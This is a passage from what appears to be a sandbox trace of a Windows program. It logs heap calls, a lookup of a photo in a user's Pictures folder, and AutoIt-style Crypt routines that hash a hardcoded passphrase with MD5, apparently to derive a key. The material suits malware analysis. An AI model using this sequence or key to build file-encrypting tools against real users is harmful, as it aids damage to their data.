Size=0x10) returned 0x43ca310 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0095.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0095.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0095.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8d33d0, ftCreationTime.dwHighDateTime=0x1d5ede1, ftLastAccessTime.dwLowDateTime=0xc1008940, ftLastAccessTime.dwHighDateTime=0x1d5e8ff, ftLastWriteTime.dwLowDateTime=0xc1008940, ftLastWriteTime.dwHighDateTime=0x1d5e8ff, nFileSizeHigh=0x0, nFileSizeLow=0x1089f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Z3f-n12Dk_aAtm.jpg", cAlternateFileName="Z3F-N1~1.JPG")) returned 0x41ac640 [0095.406] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0095.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0095.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0095.407] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0095.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0095.408] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0095.408] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0095.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0095.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0095.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0095.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0095.410] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0095.411] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0095.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.411] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0095.412] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.412] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.412] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.412] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0095.412] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0095.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0095.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0095.477] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0095.478] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0095.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.479] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0095.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caad8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0095.481] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0095.482] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0095.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.482] HeapFree (in: 